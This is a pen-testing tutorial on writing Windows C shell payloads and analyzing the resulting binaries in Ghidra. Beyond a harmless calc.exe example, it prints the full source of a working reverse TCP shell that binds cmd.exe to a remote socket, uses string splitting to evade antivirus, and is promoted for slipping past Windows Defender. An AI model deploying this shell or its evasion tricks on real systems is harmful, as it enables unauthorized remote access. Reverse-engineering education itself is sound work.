Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow

In this article, we’ll go over some example C code that is Windows x86 compatible and analyze the resulting binaries in Ghidra, to help you write or improve your shell code skills by creating the payload first. Malware analysis and reverse engineering can help penetration testers improve their evasion techniques and achieve command execution on Windows systems without relying on Linux (or ported) tools. We’ll examine samples using native Windows libraries, compilers, a C-based shell payload, and a Metasploit (MSFvenom) payload for Windows. Are you ready? Let’s dive right in!

Disclaimer: The methods, code examples, and techniques mentioned throughout this article are for educational purposes only. The author takes no responsibility for any unauthorized activities performed using the information in this article. All code or compiled binaries are provided ‘as is’ with no expressed warranty.

Feel free to download and install these tools and follow along in the article to practice your win32-ninja shell code skills with us.

Tools in Use:

Writing your first Win32 Compatible Shell Payload in C

Many cyber security professionals (including myself) aren’t experts in shell code creation or the ancient C language. So when we do pen testing engagements, our go-to tool for shell payloads is almost always Metasploit, specifically MSFVenom, along with Veil and/or some other C2 framework (in a post-Empire world) that generates the desired shell code for you. But these solutions, like any pre-made template, aren’t always perfect, and many of the vanilla payloads they produce are caught by endpoint security solutions.

So why not write our own? Many tutorials you see focus on compiling or writing payloads for Linux. If we’re compromising and pivoting between Windows systems, we need to step it up. So let’s get our first C-code template ready to go down below:

	#include <stdlib.h>	// to use system()

	int main(void)
	{
		char command[100] = "calc.exe";
		system(command);	// runs calc.exe, resolved through the system path

		return 0;
	}

Above you see one of the simplest 'cmd only' forms of shell payload. It's not a full shell, but it's a starter template that uses the standard library to execute an external command: system() hands the string to the Windows command interpreter, which finds calc.exe through the search path (which includes the System32 directory). It's quite obvious what happens in the snippet.

Note: This payload is detected as 'malware' by Chrome and Google Drive services. Windows Defender on Windows 10, at the time of this writing, does not flag the compiled binary.

You might be wondering "who cares" about the above template. It serves as a base that we can compile to a binary, giving us a very simple standard portable executable to begin reverse engineering. It will get you comfortable with navigating Ghidra: finding functions, and tracing references and variables to the decompiler window, as we'll see coming up.

Compile Your C Shell Payload in Windows

For our example template, we'll use Visual Studio (VS) since it's got nice colors and a GUI that makes it easy to showcase. You can also use the common 'MSBuild' method, which is native on most workstations, by including the C file in an XML template that it can compile. But let's use VS because I have screenshots.

Create a new project for a Win32 Console application. Ensure you've got the C++ extension installed. After the default solution files are generated, right click on the solution explorer and add a new source file. Instead of adding a C++ file with the extension (.cpp) call it (.c). The VS compiler will use the appropriate language compiler based on your extension.

Now paste in your C source code. If you try to build the solution, you may receive an error about the main function already being defined in another file. You'll have to remove (disable) the original default C/C++ file from the project so the compiler knows you won't use it.

Now that we've prepped the environment, you can compile and build the solution. If you hit 'Ctrl+F5' it'll execute the binary as well and you'll see calc.exe pop up. If you're like me, you may have started 'modifying' the shell code by adding different enhancements to try to make it more useful. Note that classic insecure functions with potential buffer overflow conditions will show up as errors or warnings and can prevent the build. You'll need to instruct the preprocessor to ignore these.

To do so, right click on your C file in solution explorer and set the configuration properties under 'preprocessor'. Edit the macros and add in (case sensitive) the warning bypass macros to the definitions field. Copy and paste the snippet below if you are running into this issue:

_CRT_SECURE_NO_WARNINGS
_CRT_SECURE_NO_DEPRECATE
_CRT_NONSTDC_NO_DEPRECATE
_WINSOCK_DEPRECATED_NO_WARNINGS

Congratulations, you've compiled your first Win32 C-source shell code. Let's analyze the binary in Ghidra so you can get a feel for what the decompiled code looks like when you DON'T have the source code, for example if you managed to isolate a sweet piece of malware that did not get detected and you want to mimic its TTPs.

Using Ghidra to Search and Decompile

In this section, we're going to import the binary into Ghidra and start exploring the structure of our original C shell code so we can identify the main() function, where variables are loaded, and the system() execution, and compare them to our source code.

When you first load the binary into Ghidra, you'll want to accept the default 'automatic analysis' settings (select YES) before you get to the main screen. From the main view, find the functions/symbols panel on the left and locate the 'entry' point, as often you won't see the main() function properly parsed.

Find the 'entry' icon in the symbol tree (functions) menu towards your bottom left pane and click on it. Your main code viewer window will jump to the entry point, where the program starts up before it executes your main function.

Also note that to the right, in the decompiler pane, is a familiar looking main() structure that Ghidra has labeled as a function named after its memory address, followed by the return. We'll rename this to main() by right clicking on the function label. This denotes the main structure of our code.

You can further explore other functions potentially called from DLL imports, as well as non-obfuscated strings, by examining the symbol tree (if the binary wasn't already stripped). Since we already have our source code, let's look for 'calc.exe', which we know is what the payload executed. *Yes, I know: You don't have that luxury examining other pieces of malware or binary shell payloads; we'll examine how to trace and map functions more effectively in our upcoming examples. Hold Tight!*

Double clicking on the location address of 'calc' in the string search window will jump us to the data segment (DS) section. To the right (highlighted in yellow), we also see local variables listed in the decompiler and pushed onto the stack. If you look carefully, it is indeed Win32 x86 Intel architecture, as the bytes are stored in little endian. Each value is also 4 bytes across, a 32-bit double word (DWORD in Windows terms), which you can validate by converting the hex to ASCII.

The careful analyst will also observe the various system call related functions surrounding our string pushed onto the stack. Let's take a closer look:

What you see above are the subroutines in the main function. We see the data 'calc.exe' being pushed onto the stack frame and the buffer being set in memory by 'memset()', followed by our famous 'system()' call. Since this is an imperfect decompile of the C code, we reference the library documentation to see what the actual structure of the source might look like (if we didn't already have the source code):

// C program to demonstrate working of memset() 
#include <stdio.h> 
#include <string.h> 
  
int main() 
{ 
    char str[50] = "GeeksForGeeks is for programming geeks."; 
    printf("\nBefore memset(): %s\n", str); 
  
    // Fill 8 characters starting from str[13] with '.' 
    memset(str + 13, '.', 8*sizeof(char)); 
  
    printf("After memset():  %s", str); 
    return 0; 
} 

In the above example from the GeeksforGeeks.org site, memset was called explicitly, but in our code it was implied by declaring and initializing the variable: char command[100] = "calc.exe";. Because the string is shorter than the array, the compiler has to zero-fill the rest of the 100-byte buffer, and here it did that with a memset() call. Now let's get to the actual 'evil' execution of our intended payload via system().

// A C++ program that pauses screen at the end in Windows OS 
#include <cstdlib>   // for system()
#include <iostream> 
using namespace std; 
int main () 
{ 
    cout << "Hello World!" << endl; 
    system("pause"); 
    return 0; 
} 

The external reference above also shows how system() is used: it simply takes a string argument, and then we see our standard return statement from the routine.

Examining a more complex sample (reverse_tcp_shell)

In this next example, we will examine a slightly modified version of a reverse TCP shell payload written in C and designed to compile and run natively on Win32. Vanilla msfvenom and other non-tuned payloads may be detected by the endpoint (antivirus); this one fared better. The original shell.c is found here, though it had a few typos that needed adjusting. The author is "Yahav N. Hoffmann" and it was written in 2016, but the compiled binary still wasn't flagged by my Windows Defender in May of 2020 on Windows 10! Amazing what custom shell coding can do. Some of his methods are similarly demonstrated in another piece of shell code authored by 'paranoidninja', which is located here (if you wish to read more on the evasion techniques).

And yes, the code works as shown in my PCAP runtime below:

For now, use the one I have hosted on my GitHub, which has the syntax corrected for easier compiling, for the purposes of this demonstration. Here's our code template to reference from:

//Another great template can be found here
//https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/


//Original location
//https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
/* Windows Reverse Shell
Test under windows 7 with AVG Free Edition.
Author: Ma~Far$ (a.k.a. Yahav N. Hoffmann)
Writen 2016 - Modified 2016
This program is open source you can copy and modify, but please keep author credit!
Made a bit more stealthy by infoskirmish.com - 2017
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32") //dc401 corrected typo of w2 to ws2

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;


int main(int argc, char* argv[])
{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	if (argv[1] == NULL) {
		exit(1);
	}

	struct hostent* host;
	host = gethostbyname(argv[1]);
	strcpy(aip_addr, inet_ntoa(*((struct in_addr*)host->h_addr)));

	hax.sin_family = AF_INET;
	hax.sin_port = htons(atoi(argv[2]));
	hax.sin_addr.s_addr = inet_addr(aip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	if (WSAGetLastError() == 0) {

		memset(&ini_processo, 0, sizeof(ini_processo));

		ini_processo.cb = sizeof(ini_processo);
		ini_processo.dwFlags = STARTF_USESTDHANDLES;
		ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

		char* myArray[4] = { "cm", "d.e", "x", "e" };
		char command[8] = "";
		snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

		CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
		exit(0);
	}
	else {
		exit(0);
	}
}

That looks exciting! We have attempted 'cmd.exe' evasion by splitting the string into an array of fragments and concatenating them later with a format string; we also have if/else branching conditions and CLI arguments we can process. Now that we've examined the code, what does it look like under a decompiler, assuming we don't have the source?

Open up Ghidra again and let's hit up the entry point, identify the main() function, and begin tracing our functions down the rabbit hole. *Don't worry, we won't be 'cheating' with specific string searches. We will examine the symbols and strings for any interesting keywords though.*

Wow, that's a lot of unique strings and good information about the variables and functions used in the data segment (DS) of our binary. Do you recognize the famous "%s%s%s%s", stored in sets of 4 bytes (32 bits)? I hope you do! But let's get more realistic and start thinking about how we can examine the decompiled pseudo code in Ghidra. Let's open up the function graph window, similar to what you would get with 'space bar' in IDA Pro or the x64dbg Graph View.

If you do a side-by-side comparison, you can see the conditional statements and potential loops from our source code in the graph view. This will help you determine where subroutines might be used and lets you focus on the true/false conditions that you'll want to investigate when creating a fork of or a patch to some C code. Another tool we can use is commonly called 'references' (xref, with the 'x' hot key in IDA).

This lets you map functions or variables that have been called or mentioned in other functions or portions of the code. As you can imagine, jumping in and out of varying functions can get very complex fast! So for pure shell code payload that is compiled, it's best to start top down from the OEP and main() function and dig into what would likely be used such as system calls and socket creations. The great thing about Ghidra is that it visualizes this for you if you 'right click' and scroll to the references sub-menu and select the open call tree option.

In the above, I've highlighted the function call tree windows for incoming and outgoing calls relative to our main() function that we renamed earlier. You'll also notice lots of 'XREF' mentions that reference the same function (main) memory address space, along with their IO in memory (Read/Write, shown in colors). What's also very interesting are all the identified native Windows C functions and their outgoing calls. Given that we have a reverse shell, I might be inclined to start investigating the WSASocketW calls first.

But, before we do that, remember when we discussed format strings? Let's revisit that code comparison and how it also looks in the C decompiler once more with rigor:

In the above, we compare our original source side by side with the decompiler window, and we see that Ghidra couldn't parse the snprintf() function as easily. Even so, the data arguments give you clues to which functions might be used. Before leaving the screen, take note of the CreateProcess function, which is not C specific but actually Windows specific, and note how it wasn't decoded. Other solutions such as IDA Pro might already have this decoded for you, but when you're learning to write shell code from scratch in C, this is great practice for your API research skills.

In the last portion of this example, we examine another part of our shell code construct. It takes two arguments, an IP and a port, according to our source code. Notice that in the decompiler, Ghidra gets very close to showing you the useful syntax and the number of arguments. We also know that this is part of the main function, as we see it is positioned very close to, and loaded right after, the entry point of the application.

What about the Metasploit payloads from msfvenom?

We don't have any screenshots of our examination of the basic Windows (non-staged) bind shell and reverse TCP shells. However, when we examined them under Ghidra, you really get a sense of just how much work the teams at Rapid7 and the security community behind the Metasploit framework have put into making them difficult to detect and robust in their error and condition handling.

We weren't able to easily jump between sections and showcase easy C structures and functions to reference after exporting (using -f exe from msfvenom), which is honestly kind of good for avoiding AV detection anyway. What this means is that you, as a seasoned pen tester, need to practice DFIR and REM skills. I've personally enjoyed my GREM certification, and it complements the GXPN very well in exercising the skills needed to develop shellcode on your own.

Closing

I hope you've enjoyed a little preview of how powerful Ghidra is and how you can exercise malware analysis and reverse engineering skills to take your shell code writing skills to the next level for Windows systems. There's so much more reading available for those wanting to extend their knowledge beyond this article. I encourage you to visit the links below in your spare time.

As always, if you enjoyed what you saw here, feel free to follow, clap, like or send me general feedback. If your organization is in need of an MSSP or other security subject matter expertise, find us online at www.scissecurity.com

Additional Resources and Examples

There’s more reading if you wish to learn more and have more templates to choose from for your initial reversing. You aren’t limited to analyzing C-based payloads; there are many other payloads and solutions that you can gather more ideas from.

Using Slack as a C2 Channel

Analyzing meterpreter payload with Ghidra

MultiOS Reverse Shell made in .NET (you can always use dotPeek to decompile the code if you only have a binary, because .NET compiles to an intermediate language)

MSbuild XML Template for Shellcode (C source ready)

Compile C code entirely from Windows CLI

Original link: https://www.linkedin.com/pulse/analyze-binaries-ghidra-write-shell-code-c-dennis-chow-mba/?trackingId=ByQoAw2HSqeq3%2FZAPduuAg%3D%3D

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

June 23, 2020
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013
